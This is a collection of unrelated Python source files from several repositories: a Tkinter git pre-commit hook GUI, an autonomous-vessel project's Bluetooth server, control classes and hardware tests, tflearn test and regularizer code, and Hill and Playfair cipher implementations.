tk.Label(self.framesum, text="Files Being Commited: " + CommFiles, anchor = tk.W, justify = tk.LEFT ).grid(row=1, column=0, sticky='w')
tk.Label(self.framesum, text="Commit Message: ", anchor = tk.W, justify = tk.LEFT ).grid(row=2, column=0, sticky='w')
tk.Label(self.framesum, text="Email Message: ", anchor = tk.W, justify = tk.LEFT, ).grid(row=3, column=0, sticky='w')
tk.Text(self.framesum, height=3, width=70).grid(row=4, columnspan = 4)
def TestFrame(self):
#Testing window
self.test_left = tk.Frame(self.frametest)
self.test_right = tk.Frame(self.frametest, padx=50, pady=3)
self.test_left.columnconfigure(0, weight=1)
self.test_right.columnconfigure(0, weight=1)
self.test_left.grid(row=0, column=0, sticky="ns")
self.test_right.grid(row=0, column=1, sticky="ns")
tk.Label(self.test_left, text="Code Complexity: ", anchor = tk.W, justify = tk.LEFT, ).grid(row=0, column=0, sticky='e')
tk.Label(self.test_left, text="Run Linter: ", anchor = tk.W, justify = tk.LEFT, ).grid(row=1, column=0, sticky='e')
tk.Button(self.test_left, text="OK").grid(row=1, column=1, sticky='w')
tk.Label(self.test_left, text="Run Scenario Tools: ", anchor = tk.W, justify = tk.LEFT, ).grid(row=2, column=0, sticky='e')
tk.Button(self.test_left, text="OK").grid(row=2, column=1, sticky='w')
tk.Label(self.test_left, text="Update Doc: ", anchor = tk.W, justify = tk.LEFT, ).grid(row=3, column=0, sticky='e')
tk.Button(self.test_left, text="OK").grid(row=3, column=1, sticky='w')
tk.Label(self.test_right, text="Run Tests: ", anchor = tk.W, justify = tk.LEFT, ).grid(row=0, column=0, sticky='e')
tk.Button(self.test_right, text="OK").grid(row=0, column=1, sticky='w')
def DiffFrame(self,diffLog=""):
#Diff window
tk.Label(self.framediff, text="Code Diff: \n \n" + diffLog, anchor = tk.W, justify = tk.LEFT, ).grid(row=0, column=0, sticky='e')
#get information:
localPath = os.getcwd()
vv = subprocess.Popen(['git', 'config', '--get', 'remote.origin.url'], stdout = subprocess.PIPE)
remotePath = vv.stdout.read().decode('utf-8', 'replace').strip()
vv = subprocess.Popen(['git', 'config', 'user.name'], stdout = subprocess.PIPE)
Author = vv.stdout.read().decode('utf-8', 'replace').strip()
vv = subprocess.Popen(['git', 'config', 'user.email'], stdout = subprocess.PIPE)
AuthorEmail = vv.stdout.read().decode('utf-8', 'replace').strip()
## note: diff --cached because the code has been staged (added) at this point.
vv = subprocess.Popen(['git', 'diff', '--cached', '--name-only'], stdout = subprocess.PIPE)
CommFiles = vv.stdout.read().decode('utf-8', 'replace').strip()
CommFiles = CommFiles.replace("\n",", ")
vv = subprocess.Popen(['git', 'diff', '--cached'], stdout = subprocess.PIPE)
diffLog = vv.stdout.read().decode('utf-8', 'replace').strip()
# try to read the mailing list and approval list - else create them (a+)
with open('.git/hooks/hooks.mailinglist','a+') as maillist, open('.git/hooks/hooks.approvallist','a+') as approvallist:
maillist.seek(0)
approvallist.seek(0)
Notify = maillist.read()
Request = approvallist.read()
#start GUI
root = tk.Tk()
app = Application(master=root)
app.SummaryFrame(localPath,remotePath,Author,AuthorEmail,CommFiles,Notify,Request)
app.DiffFrame(diffLog)
app.mainloop()
print("****** End of Pre-Commit Hook ******","\n")
``` |
{
"source": "jjoyce0510/autonomous-shipping-vessel",
"score": 3
} |
#### File: main/python/BluetoothManager.py
```python
from bluetooth import *
class BluetoothManager:
    dataReceived = False
data = ""
def __init__(self):
# Create the server
self.serverSock = BluetoothSocket(RFCOMM)
self.serverSock.bind(("", PORT_ANY))
self.serverSock.listen(1)
self.port = self.serverSock.getsockname()[1]
self.uuid = "94f39d29-7d6d-437d-973b-fba39e49d4ee"
self.startServer()
def startServer(self):
advertise_service(self.serverSock, "SampleServer", service_id = self.uuid,
service_classes = [ self.uuid, SERIAL_PORT_CLASS ], profiles = [ SERIAL_PORT_PROFILE ])
print("Waiting for connection on RFCOMM channel %d" % self.port)
        self.connect()  # block until a client connects and sends data
def connect(self):
        while not self.dataReceived:
clientSock, clientInfo = self.serverSock.accept()
print("Accepted connection from ", clientInfo)
try:
while True:
newData = clientSock.recv(1024)
                    self.data = self.data + newData.decode("utf-8", "replace")  # recv returns bytes on Python 3
if len(newData) == 0: break
                    else: self.dataReceived = True
except IOError:
pass
print("Disconnected.")
clientSock.close()
def getData(self):
return self.data
def hasData(self):
        return self.dataReceived
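# Minimal usage sketch (illustrative, not part of the original file):
# constructing the manager advertises the service and blocks in connect()
# until a paired RFCOMM client sends data.
# manager = BluetoothManager()
# print(manager.getData())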
```
#### File: python/control/Object.py
```python
class Object:
distanceInCm = None
radProp = 0.0
angleFromCenter = 0.0
    # This is probably not always reliable, unless we are going straight into something.
def getDistance(self):
return self.distanceInCm
def setDistance(self, dist):
self.distanceInCm = dist
def setRadiusProportion(self, radProp):
self.radProp = radProp
def setAngleFromCenter(self, angleFromCenter):
self.angleFromCenter = angleFromCenter
def getAngleFromCenter(self):
return self.angleFromCenter
def getRadiusProportion(self):
return self.radProp
def isValid(self):
return self.distanceInCm is not None or self.radProp is not None or self.angleFromCenter is not None
```
#### File: python/control/VesselControls.py
```python
class VesselControls:
servo = None
motor = None
def __init__(self, motor, servo):
self.motor = motor
self.servo = servo
def getCurrentVelocity(self):
return self.motor.getVelocity()
def getCurrentAngle(self):
return self.servo.getAngle()
def setVelocity(self, velocity):
if self.motor.getVelocity() is not velocity:
self.motor.setVelocity(velocity)
def setAngle(self, angle):
self.servo.setAngle(angle)
def setAngleAndVelocity(self, angle, velocity):
self.setAngle(angle)
self.setVelocity(velocity)
def startMotor(self):
self.motor.start()
def stopMotor(self):
self.motor.stop()
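# Usage sketch (illustrative; `motor` and `servo` are hypothetical wrapper objects
# that expose start/stop/getVelocity/setVelocity and getAngle/setAngle as used above):
# controls = VesselControls(motor, servo)
# controls.startMotor()
# controls.setAngleAndVelocity(15.0, 30.0)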
```
#### File: test/python/TestCoordinates.py
```python
from src.main.python.wrappers.gps.Coordinates import Coordinates
# Created by <NAME> on November 27, 2017
class TestCoordinates:
def __init__(self):
self.coord_0 = Coordinates(0,0)
self.coord_1 = Coordinates(1,2)
self.coord_2 = Coordinates(0,0)
self.coord_3 = Coordinates(4,6)
self.coord_4 = Coordinates(1,1)
self.coord_5 = Coordinates(-1,-1)
self.coord_6 = Coordinates(1,-1)
self.coord_7 = Coordinates(-1,1)
self.coord_8 = Coordinates(0,1)
self.coord_9 = Coordinates(1,0)
self.coord_10 = Coordinates(-1,0)
self.coord_11 = Coordinates(0,-1)
self.coord_tests()
def coord_tests(self):
assert(self.test_getLat())
assert(self.test_getLon())
assert(self.test_setLat())
assert(self.test_setLon())
assert(self.test_calculateDistanceTo())
assert(self.test_calculateAngleFrom())
assert(self.test_calculateRotation())
print "Coordinates Tests Completed"
def test_getLat(self):
if self.coord_0.getLat() != 0:
return False
if self.coord_1.getLat() != 1:
return False
return True
def test_getLon(self):
if self.coord_0.getLon() != 0:
return False
if self.coord_1.getLon() != 2:
return False
return True
def test_setLat(self):
if self.coord_2.getLat() != 0:
return False
self.coord_2.setLat(3)
if self.coord_2.getLat() != 3:
return False
return True
def test_setLon(self):
if self.coord_2.getLon() != 0:
return False
self.coord_2.setLon(4)
if self.coord_2.getLon() != 4:
return False
return True
def test_calculateDistanceTo(self):
if self.coord_1.calculateDistanceTo(self.coord_3) != 5.0:
return False
return True
def test_calculateAngleFrom(self):
out = self.coord_1.calculateAngleFrom(self.coord_3)
if out < 53.1 or out > 53.2:
return False
if self.coord_0.calculateAngleFrom(self.coord_4) != 45:
return False
if self.coord_0.calculateAngleFrom(self.coord_5) != -135:
return False
if self.coord_0.calculateAngleFrom(self.coord_6) != -45:
return False
if self.coord_0.calculateAngleFrom(self.coord_7) != 135:
return False
if self.coord_0.calculateAngleFrom(self.coord_8) != 90:
return False
if self.coord_0.calculateAngleFrom(self.coord_9) != 0:
return False
if self.coord_0.calculateAngleFrom(self.coord_10) != 180:
return False
if self.coord_0.calculateAngleFrom(self.coord_11) != -90:
return False
return True
def test_calculateRotation(self):
if self.coord_0.calculateRotation(0, 45) != 45:
return False
if self.coord_0.calculateRotation(-45, 45) != 90:
return False
if self.coord_0.calculateRotation(-180, 45) != -135:
return False
if self.coord_0.calculateRotation(50, 45) != -5:
return False
if self.coord_0.calculateRotation(50, 90) != 40:
return False
if self.coord_0.calculateRotation(180, 190) != 10:
return False
if self.coord_0.calculateRotation(270, 0) != 90:
return False
if self.coord_0.calculateRotation(270, 89) != 179:
return False
if self.coord_0.calculateRotation(720, 1081) != 1:
return False
if self.coord_0.calculateRotation(0, 180) != 180:
return False
if self.coord_0.calculateRotation(180, 0) != -180:
return False
if self.coord_0.calculateRotation(315, -10) != 35:
return False
if self.coord_0.calculateRotation(315, 45) != 90:
return False
if self.coord_0.calculateRotation(315, -90) != -45:
return False
return True
```
#### File: test/python/TestLidar.py
```python
from src.main.python.wrappers.lidar.Lidar import Lidar
from src.main.python.exceptions.HardwareException import HardwareException
class TestLidar:
lidar = Lidar()
def __init__(self):
dist = self.lidar.getDistance()
print "Distance: " + str(dist)
if dist <= 0.0:
raise HardwareException
```
#### File: test/python/TestMotor.py
```python
from src.main.python.wrappers.motor.MotorController import MotorController
from src.main.python.exceptions.HardwareException import HardwareException
import time
class TestMotor:
motorController = MotorController()
def __init__(self):
self.testVelocity()
def testVelocity(self):
self.motorController.start()
self.motorController.setVelocity(0.0)
        print(self.motorController.getVelocity())
time.sleep(4.0)
self.motorController.setVelocity(30.0)
        print(self.motorController.getVelocity())
time.sleep(7.0)
self.motorController.stop()
``` |
{
"source": "jjpalacio/tflearn",
"score": 3
} |
#### File: tflearn/tests/test_objectives.py
```python
import tflearn
import unittest
import numpy as np
import tensorflow as tf
class TestObjectives(unittest.TestCase):
"""
Testing objective functions from tflearn/objectives
"""
def test_weak_cross_entropy_2d(self):
"""
Test tflearn.objectives.weak_cross_entropy_2d
"""
num_classes = 2
batch_size = 3
height, width = 5, 5
shape = (batch_size, height, width, num_classes)
y_pred = np.random.random(shape).astype(np.float32)
target = np.random.randint(0, num_classes, np.prod(shape[:-1]))
# convert to one-hot encoding
y_true = np.eye(num_classes)[target].reshape(shape)
with tf.Graph().as_default():
y_pred = tf.convert_to_tensor(y_pred)
y_true = tf.convert_to_tensor(y_true)
loss = tflearn.objectives.weak_cross_entropy_2d(y_pred, y_true)
with tf.Session() as sess:
res = sess.run(loss)
self.assertGreater(res, 0.)
self.assertLess(res, 1.)
if __name__ == "__main__":
unittest.main()
```
#### File: tflearn/tflearn/regularizers.py
```python
from __future__ import division, print_function, absolute_import
import tensorflow as tf
from .utils import get_from_module
def get(identifier):
if hasattr(identifier, '__call__'):
return identifier
else:
return get_from_module(identifier, globals(), 'regularizer')
def L2(tensor, wd=0.001):
""" L2.
Computes half the L2 norm of a tensor without the `sqrt`:
output = sum(t ** 2) / 2 * wd
Arguments:
tensor: `Tensor`. The tensor to apply regularization.
wd: `float`. The decay.
Returns:
The regularization `Tensor`.
"""
return tf.multiply(tf.nn.l2_loss(tensor), wd, name='L2-Loss')
def L1(tensor, wd=0.001):
""" L1.
Computes the L1 norm of a tensor:
output = sum(|t|) * wd
Arguments:
tensor: `Tensor`. The tensor to apply regularization.
wd: `float`. The decay.
Returns:
The regularization `Tensor`.
"""
return tf.multiply(tf.reduce_sum(tf.abs(tensor)), wd, name='L1-Loss')
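# Quick numeric sanity check (illustrative, TF1 session style; not part of the module):
# with tf.Graph().as_default():
#     t = tf.constant([3.0, 4.0])
#     with tf.Session() as sess:
#         print(sess.run(L2(t, wd=1.0)))  # 0.5 * (9 + 16) = 12.5
#         print(sess.run(L1(t, wd=1.0)))  # (3 + 4) * 1.0 = 7.0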
``` |
{
"source": "jjpaq/linedraw",
"score": 2
} |
#### File: jjpaq/linedraw/filters.py
```python
from PIL import Image, ImageDraw, ImageOps, ImageFilter
from random import *
import math
F_Blur = {
(-2,-2):2,(-1,-2):4,(0,-2):5,(1,-2):4,(2,-2):2,
(-2,-1):4,(-1,-1):9,(0,-1):12,(1,-1):9,(2,-1):4,
(-2,0):5,(-1,0):12,(0,0):15,(1,0):12,(2,0):5,
(-2,1):4,(-1,1):9,(0,1):12,(1,1):9,(2,1):4,
(-2,2):2,(-1,2):4,(0,2):5,(1,2):4,(2,2):2,
}
F_SobelX = {(-1,-1):1,(0,-1):0,(1,-1):-1,(-1,0):2,(0,0):0,(1,0):-2,(-1,1):1,(0,1):0,(1,1):-1}
F_SobelY = {(-1,-1):1,(0,-1):2,(1,-1):1,(-1,0):0,(0,0):0,(1,0):0,(-1,1):-1,(0,1):-2,(1,1):-1}
def appmask(IM,masks):
PX = IM.load()
w,h = IM.size
NPX = {}
for x in range(0,w):
for y in range(0,h):
a = [0]*len(masks)
for i in range(len(masks)):
for p in masks[i].keys():
if 0<x+p[0]<w and 0<y+p[1]<h:
a[i] += PX[x+p[0],y+p[1]] * masks[i][p]
if sum(masks[i].values())!=0:
a[i] = a[i] / sum(masks[i].values())
NPX[x,y]=int(sum([v**2 for v in a])**0.5)
for x in range(0,w):
for y in range(0,h):
PX[x,y] = NPX[x,y]
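# Usage sketch (illustrative file names): compute a Sobel gradient magnitude in place.
# im = Image.open("input.jpg").convert("L")
# appmask(im, [F_SobelX, F_SobelY])
# im.save("edges.jpg")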
``` |
{
"source": "jjpaulo2/crud-pymongo",
"score": 3
} |
#### File: crud/crud/crud_clientes.py
```python
from pymongo import MongoClient
from .crud import CollectionCRUD
class ClientesCRUD(CollectionCRUD):
"""
    CRUD class for the `clientes` collection of the `loja` database
"""
def __init__(self, mongo_client: MongoClient):
DATABASE = "loja"
COLLECTION = "clientes"
super().__init__(mongo_client, DATABASE, COLLECTION)
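# Usage sketch (assumes a MongoDB instance reachable at the default local URI):
# client = MongoClient("mongodb://localhost:27017")
# clientes_crud = ClientesCRUD(client)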
```
#### File: crud/tests/test_insert.py
```python
from bson.objectid import ObjectId
from .crud_test_case import CRUDTestCase
class CRUDInsertTestCase(CRUDTestCase):
"""
    Insertion test cases
"""
def test_insert_one_document(self) -> None:
"""
        Tests for the `CollectionCRUD.insert` method, which inserts
        one document at a time into the collection
"""
for cliente in self.clientes:
id = self.clientes_crud.insert(cliente)
type_id = type(id)
self.assertEqual(type_id, ObjectId)
def test_insert_many_documents(self) -> None:
"""
Testes do método `CollectionCRUD.insert_many` que insere
vários documentos por vez na collection
"""
ids = self.clientes_crud.insert_many(self.clientes)
type_ids = [type(id) for id in ids]
for type_id in type_ids:
self.assertEqual(type_id, ObjectId)
``` |
{
"source": "jjpaulo2/gerador-planilha",
"score": 4
} |
#### File: gerador_planilha_desktop/gerador_planilha/__init__.py
```python
from .reader import read_and_format_workbook_to_row_list
from . import writer
def generate_worksheet(input_file: str, output_file: str, window=None):
"""
    Function that runs the module's procedure in logical order.
    It is the method called from the `__main__.py` file.
    Arguments:
        input_file (str): string with the path of the input file
            that will be read
        output_file (str): string with the path of the output file that
            will hold the data extracted from the initial file
"""
formated = read_and_format_workbook_to_row_list(input_file, window=window)
writer.generate_workbook_file(formated, output_file, window=window)
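# Usage sketch (hypothetical file names):
# generate_worksheet("input.xlsx", "output.xlsx")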
``` |
{
"source": "jjpaulo2/sonic-pygame",
"score": 3
} |
#### File: game/telas/TelaDeInicio.py
```python
import pathlib, pygame
class TelaDeInicio:
def __init__(self, tela):
self.fundo_path = str(pathlib.Path(__file__).parent.absolute()) + "/../../img/fundo-menu.jpg"
self.musica_path = str(pathlib.Path(__file__).parent.absolute()) + "/../../audio/title.wav"
self.tela = tela
self.fonte = pygame.font.Font(str(pathlib.Path(__file__).parent.absolute()) + "/../../fonts/ARCADECLASSIC.TTF", 40)
self.press_start = self.fonte.render(" PRESS ENTER ", False, (255,255,255), (30,35,150))
self.EVENTO_PISCAR = pygame.USEREVENT + 1
def tocar_musica(self):
pygame.mixer.music.load(self.musica_path)
pygame.mixer.music.set_volume(0.5)
pygame.mixer.music.play()
def renderizar_fundo(self):
fundo = pygame.image.load(self.fundo_path)
self.tela.blit(fundo, (0,0))
def renderizar_press_start(self):
self.tela.blit(self.press_start, (280,520))
self.press_start_aparecendo = True
def rodar_cenario(self):
self.renderizar_fundo()
self.tocar_musica()
self.rodando = True
self.renderizar_press_start()
pygame.time.set_timer(self.EVENTO_PISCAR, 500)
def atualizar_eventos(self, evento, fase):
if evento.type == self.EVENTO_PISCAR:
if self.press_start_aparecendo:
self.renderizar_fundo()
self.press_start_aparecendo = False
else:
self.renderizar_press_start()
self.press_start_aparecendo = True
if evento.type == pygame.KEYDOWN:
if evento.key == pygame.K_RETURN:
pygame.mixer.music.fadeout(500)
pygame.time.set_timer(self.EVENTO_PISCAR, 0)
self.rodando = False
def atualizar_cenario(self):
pass
``` |
{
"source": "jjpolaczek/CTF_attempts",
"score": 2
} |
#### File: CTF_attempts/NahamCon2021/the_list.py
```python
from pwn import *
get_flag = 0x401369
bin_flag = get_flag.to_bytes(4,'little') + b"\0"*4
bin_short_flag = b"\x69\x13\x40"
override =[]
for i in range(5):
override.append(bin_flag)
override = b"".join(override)
print(override)
tmot = 1.0
io = remote('challenge.nahamcon.com', 32521)
def addUser(name):
io.sendline("2")
print(io.recv(timeout=tmot)) # Prompt
io.sendline(name)
print(io.recv(timeout=tmot)) # User added
print(io.recv(timeout=tmot)) # Menu
def chgName(idx, data):
io.sendline("4")
print(io.recv(timeout=tmot)) # Prompt
io.sendline("%d" % idx)
print(io.recv(timeout=tmot)) # Prompt
io.sendline(data)
print(io.recv(timeout=tmot)) # Sucess
#unused handlers
def printUsers():
io.sendline("1")
print(io.recv(timeout=tmot)) # emptyLine
print(io.recv(timeout=tmot)) # Prompt
def exitProg():
io.sendline("5")
print(io.recv(timeout=tmot)) # Prompt
def delUser(no):
io.sendline("3")
print(io.recv(timeout=tmot)) # Prompt
io.sendline("%d" % no)
print(io.recv(timeout=tmot)) # User deleted
print(io.recv()) # name
io.sendline("kubaa")
print(io.recv(timeout=tmot)) # Welcome name
print(io.recv(timeout=tmot)) # Menu
for i in range(18):
addUser("x")
payload = b"\0"*0x1F + b"\0" + b'\0'*8 + bin_flag
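# offsets inferred from the payload above: 0x20 bytes fill the name buffer,
# 8 more bytes of padding, then the stored function pointer is overwritten
# with the address of get_flag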
print(hex(len(payload)))
print(payload + b"\0")
chgName(18, payload)
print("\r\n")
io.interactive(2)
``` |
{
"source": "jjpr-mit/mkgu",
"score": 2
} |
#### File: mkgu/mkgu/__init__.py
```python
__author__ = """<NAME>"""
__email__ = '<EMAIL>'
__version__ = '0.1.0'
from . import fetch
def get_assembly(name):
return fetch.get_assembly(name)
```
#### File: mkgu/mkgu/presentations.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
class Presentation(object):
"""An instance of presenting a stimulus to a system, to evoke a response. """
def __init__(self, stimulus):
self.stimulus = stimulus
class Stimulus(object):
"""A Stimulus instance represents an input to a system for which data are being recorded. """
def __init__(self):
pass
class StimulusSet(object):
"""A StimulusSet instance represents a set of stimuli associated with a DataAssembly"""
def __init__(self):
pass
``` |
{
"source": "jjpro201/JJPRO_GAME",
"score": 3
} |
#### File: jjpro201/JJPRO_GAME/animation.py
```python
import pygame
# class in charge of the sprite animations
class AnimateSprite(pygame.sprite.Sprite):
    # setup performed when the entity is created
    def __init__(self, sprite_name, size=(200, 200)):
        super().__init__()
        self.size = size
        self.image = pygame.image.load(f'assets/{sprite_name}.png')
        self.image = pygame.transform.scale(self.image, size)
        self.current_image = 0  # start the animation at frame 0
        self.images = animations.get(sprite_name)
        self.animation = False
    # method that starts the animation
    def start_animation(self):
        self.animation = True
    # method that animates the sprite
    def animate(self, loop=False):
        # only advance while the animation is active
        if self.animation:
            # move on to the next frame
            self.current_image += 1
            # check whether the last frame has been reached
            if self.current_image >= len(self.images):
                # reset the animation to the first frame
                self.current_image = 0
                # if the animation is not meant to loop
                if loop is False:
                    # deactivate the animation
                    self.animation = False
            # replace the previous frame with the next one
            self.image = self.images[self.current_image]
            self.image = pygame.transform.scale(self.image, self.size)
# function that loads the frames of a sprite
def load_animation_images(sprite_ame):
    # load this sprite's frames from the matching folder
    images = []
    # build the folder path for the given sprite
    path = f"assets/{sprite_ame}/{sprite_ame}"
    # expected layout: assets/player/player1.png ... assets/player/player23.png
    # loop over every frame in the folder
    for num in range(1, 24):
        image_path = path + str(num) + '.png'
        images.append(pygame.image.load(image_path))
    # return the loaded frames
    return images
# dictionary holding the loaded animation frames for each sprite
animations = {
    'mummy': load_animation_images('mummy'),
    'player': load_animation_images('player'),
    'alien': load_animation_images('alien')
}
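# Usage sketch (illustrative; assumes assets/player.png plus the frame files
# assets/player/player1.png ... player23.png exist on disk):
# sprite = AnimateSprite('player')
# sprite.start_animation()
# sprite.animate(loop=True)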
```
#### File: jjpro201/JJPRO_GAME/sounds.py
```python
import pygame
class SoundManager:
def __init__(self):
self.sounds = {
'click': pygame.mixer.Sound("assets/sounds/click.ogg"),
'game_over': pygame.mixer.Sound("assets/sounds/game_over.ogg"),
'meteorite': pygame.mixer.Sound("assets/sounds/meteorite.ogg"),
'tir': pygame.mixer.Sound("assets/sounds/tir.ogg")
}
def play(self, name):
        self.sounds[name].play()
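# Usage sketch (illustrative; the mixer must be initialised before Sound objects load):
# pygame.mixer.init()
# sounds = SoundManager()
# sounds.play('click')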
``` |
{
"source": "JJP-SWFC/Self-Checking-Binary-Code",
"score": 3
} |
#### File: JJP-SWFC/Self-Checking-Binary-Code/selfchecking1.py
```python
from tkinter import *
import numpy as np
import random
# generates 16 random binary digits
digtexts = np.random.randint(2, size=16)
q1check = 0
q2check = 0
q3check = 0
q4check = 0
q5check = 0
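# q1..q4 track the parity of the four Hamming groups (positions whose index has
# bit 1, 2, 4 or 8 set); q5 tracks the overall parity used by the final check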
# The function that flips the button's digit between 1 and 0; used as the button command
def flipper0():
#Probably an awful way of swapping a 1 to a 0 but oh well
dig0["text"] = (str(int((not bool(int(dig0["text"]))))))
def flipper1():
dig1["text"] = (str(int((not bool(int(dig1["text"]))))))
def flipper2():
dig2["text"] = (str(int((not bool(int(dig2["text"]))))))
def flipper4():
dig4["text"] = (str(int((not bool(int(dig4["text"]))))))
def flipper8():
dig8["text"] = (str(int((not bool(int(dig8["text"]))))))
def checkAnswer():
global q1check, q2check, q3check, q4check, q5check
    # save the current checks so they can be restored afterwards
oldq1 = q1check
oldq2 = q2check
oldq3 = q3check
oldq4 = q4check
oldq5 = q5check
    # Reset every label and button to the default background
    for widget in (dig0, dig1, dig2, dig3, dig4, dig5, dig6, dig7,
                   dig8, dig9, dig10, dig11, dig12, dig13, dig14, dig15):
        widget["background"] = "SystemButtonFace"
#Gets the text of each of the buttons
selzero = dig0["text"]
selone = dig1["text"]
seltwo = dig2["text"]
selfour = dig4["text"]
seleight = dig8["text"]
#adds the 1s to the total if the selection is a 1
q1check += int(selone)
q2check += int(seltwo)
q3check += int(selfour)
q4check += int(seleight)
q5check += int(selzero) + int(selone) + int(seltwo) + int(selfour) + int(seleight)
if q1check%2 != 0:
print("Check the first selection box")
#Highlights the boxes for this selection
dig1["background"] = "light blue"
dig5["background"] = "light blue"
dig9["background"] = "light blue"
dig13["background"] = "light blue"
dig3["background"] = "light blue"
dig7["background"] = "light blue"
dig11["background"] = "light blue"
dig15["background"] = "light blue"
elif q2check%2 != 0:
print("Check the second selection box")
dig2["background"] = "light blue"
dig6["background"] = "light blue"
dig10["background"] = "light blue"
dig14["background"] = "light blue"
dig3["background"] = "light blue"
dig7["background"] = "light blue"
dig11["background"] = "light blue"
dig15["background"] = "light blue"
elif q3check%2 != 0:
print("Check the third selection box")
dig4["background"] = "light blue"
dig5["background"] = "light blue"
dig6["background"] = "light blue"
dig7["background"] = "light blue"
dig12["background"] = "light blue"
dig13["background"] = "light blue"
dig14["background"] = "light blue"
dig15["background"] = "light blue"
elif q4check%2 != 0:
print("Check the final selection box")
dig8["background"] = "light blue"
dig9["background"] = "light blue"
dig10["background"] = "light blue"
dig11["background"] = "light blue"
dig12["background"] = "light blue"
dig13["background"] = "light blue"
dig14["background"] = "light blue"
dig15["background"] = "light blue"
elif q5check %2 != 0:
print("You have an odd number of 1s")
else:
print("Well done! You got it right!")
#Puts the checks back to their previous state
q1check = oldq1
q2check = oldq2
q3check = oldq3
q4check = oldq4
q5check = oldq5
if __name__ == "__main__":
#The name of the main thing
gui = Tk()
#Adds the "check answer" button
checkmyanswer = Button(gui, text="Check Answer", command=checkAnswer)
#Add all the buttons and put them in their place "pady" adds vertical space
dig0 = Button(gui, text=digtexts[0], command=flipper0)
dig1 = Button(gui, text=digtexts[1], command=flipper1)
dig2 = Button(gui, text=digtexts[2], command=flipper2)
dig4 = Button(gui, text=digtexts[4], command=flipper4)
dig8 = Button(gui, text=digtexts[8], command=flipper8)
dig0.grid(row=0,column=0,pady=5)
dig1.grid(row=0,column=1)
dig2.grid(row=0,column=2)
dig4.grid(row=1,column=0)
dig8.grid(row=2,column=0,pady=5)
#Make all the rest random, also probably horribly inefficient but it's not a big code so it's fine for now
dig3 = Label(gui, text=digtexts[3])
dig5 = Label(gui, text=digtexts[5])
dig6 = Label(gui, text=digtexts[6])
dig7 = Label(gui, text=digtexts[7])
dig9 = Label(gui, text=digtexts[9])
dig10 = Label(gui, text=digtexts[10])
dig11 = Label(gui, text=digtexts[11])
dig12 = Label(gui, text=digtexts[12])
dig13 = Label(gui, text=digtexts[13])
dig14 = Label(gui, text=digtexts[14])
dig15 = Label(gui, text=digtexts[15])
#Sets all of the positions of each label
dig3.grid(row=0,column=3)
dig5.grid(row=1,column=1)
dig6.grid(row=1,column=2)
dig7.grid(row=1,column=3)
dig9.grid(row=2,column=1)
dig10.grid(row=2,column=2)
dig11.grid(row=2,column=3)
dig12.grid(row=3,column=0)
dig13.grid(row=3,column=1)
dig14.grid(row=3,column=2)
dig15.grid(row=3,column=3)
#Makes sure that "checkanswer" spans across all 4 columns and also has a bit of space from the text
checkmyanswer.grid(row=4, columnspan=4, pady=5)
#Numbers 0 through to 15
for i in range(16):
        # Checks that i is not a power of 2 (powers of 2 are the parity/selector positions)
        if (i & (i - 1)) != 0:
#Checks if the last digit is a 1
if (str(format(i,"04b"))[3]) == "1":
if digtexts[i] == 1:
q1check += 1
#Checks if the second to last digit is a 1
if (str(format(i,"04b"))[2]) == "1":
if digtexts[i] == 1:
q2check += 1
#Checks if the third to last digit is a 1
if (str(format(i,"04b"))[1]) == "1":
if digtexts[i] == 1:
q3check += 1
#Checks if the fourth to last digit is a 1
if (str(format(i,"04b"))[0]) == "1":
if digtexts[i] == 1:
q4check += 1
#Just checks all of the 1s that aren't the "selector" ones
if digtexts[i] == 1:
q5check += 1
#Runs the system
gui.mainloop()
``` |
{
"source": "jjpulidos/Crypto-UNAL-2020",
"score": 4
} |
#### File: Crypto-UNAL-2020/Hill/HillCipher.py
```python
import numpy as np
from sympy import Matrix
class HillCipher:
def __init__(self, message, matrix_list):
self.alphabet = {chr(i): i - 97 for i in range(97, 123)}
self.message = message
self.matrix = matrix_list
self.message_numbers = np.array([self.alphabet[x] for x in message]).reshape((-1, 2))
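        # e.g. "july" becomes [[9, 20], [11, 24]] (a=0 ... z=25, grouped in pairs)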
def cipher_decipher(self, to_cipher):
ciphered_message = ""
if to_cipher:
for vector in self.message_numbers:
for i in (vector @ self.matrix) % 26:
ciphered_message += chr(i+97)
return ciphered_message
else:
deciphered_message = ""
try:
inverse = np.array(Matrix(self.matrix).inv_mod(26))
for vector in self.message_numbers:
for i in (vector @ inverse) % 26:
deciphered_message += chr(i + 97)
except Exception:
raise Exception("Not invertible matrix")
return deciphered_message
def main():
message = input("Insert Message:\n")
# message = "JULY"
matrix = []
print("Consider the positions of the key matrix as follows: \n")
print("(1 2")
print(" 3 4)")
print()
for i in range(4):
matrix.append(int(input("Insert Value in the position " + str(i) + " of the matrix key: \n")))
matrix = np.array(matrix).reshape((2, 2))
print()
cipher = HillCipher(message.lower().replace(" ", ""), matrix)
ciphered_message = cipher.cipher_decipher(1)
print("Ciphered Message:", ciphered_message)
decipher = HillCipher(ciphered_message.lower().replace(" ", ""), matrix)
deciphered_message = decipher.cipher_decipher(0)
print("Deciphered message:", deciphered_message)
if __name__ == '__main__':
main()
```
#### File: Crypto-UNAL-2020/PlayFairCipher/main.py
```python
import collections
import numpy as np
def Diff(li1, li2):
return (list(set(li1) - set(li2)))
class PlayFair:
def __init__(self, message, key, action):
self.message = message.lower()
self.message = self.message.replace(" ", "")
self.action = action
        # walk the message in digraphs and insert an 'x' between doubled letters
        i = 0
        while i < len(self.message) - 1:
            if self.message[i] == self.message[i + 1]:
                self.message = self.message[:i + 1] + 'x' + self.message[i + 1:]
            i += 2
if (len(self.message) % 2 != 0):
self.message += "x"
self.key = key.lower()
self.key = self.key.replace(" ", "")
self.key_without_repetition = list(collections.OrderedDict.fromkeys(self.key).keys())
self.alfabeto_no_presente = Diff(
[chr(x) if chr(x) != 'j' else 'ij' if chr(x) == 'i' else None for x in range(97, 123)],
self.key_without_repetition)
self.alfabeto_no_presente = [x for x in self.alfabeto_no_presente if x is not None]
self.alfabeto_no_presente.sort()
def init_square(self):
self.square = np.zeros((5, 5))
tam_list = len(self.key_without_repetition)
tmp_list = np.array(self.key_without_repetition[:tam_list] + self.alfabeto_no_presente[:(25 - tam_list)])
self.square = np.reshape(tmp_list, (5, 5))
self.dict_col = {}
self.dict_row = {}
for i in range(0, 5):
for j in range(0, 5):
self.dict_col[self.square[i][j]] = j
self.dict_row[self.square[i][j]] = i
self.dict_col["j"] = self.dict_col["i"]
self.dict_row["j"] = self.dict_row["i"]
self.alfabeto_no_presente = ['i/j' if x == 'i' else x for lst in self.alfabeto_no_presente for x in lst]
self.key_without_repetition = ['i/j' if x == 'i' else x for lst in self.key_without_repetition for x in lst]
